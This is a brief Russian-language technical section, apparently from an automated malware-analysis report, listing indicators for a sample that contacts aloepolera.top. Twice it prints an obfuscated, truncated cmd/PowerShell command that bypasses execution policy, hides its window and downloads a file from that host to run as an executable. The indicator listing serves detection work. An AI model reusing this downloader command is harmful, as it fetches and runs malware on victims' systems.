Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOweRs^h^e^ll.exe -e^X^E^cu^tIO^NP^Ol^ICy BY^pass -n^oPr^ofIl^e^ -W^in^dOws^tyl^E^ Hi^D^dEN (^n^eW-^ObJect sy^StEm.NE^T.weBcl^ienT).D^oWNlO^aDfIle('http://aloepolera.top/r...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "pOweRs^h^e^ll.exe -e^X^E^cu^tIO^NP^Ol^ICy BY^pass -n^oPr^ofIl^e^ -W^in^dOws^tyl^E^ Hi^D^dEN (^n^eW-^ObJect sy^StEm.NE^T.weBcl^ienT).D^oWNlO^aDfIle('http://aloepolera.top/r...' (со скрытым окном)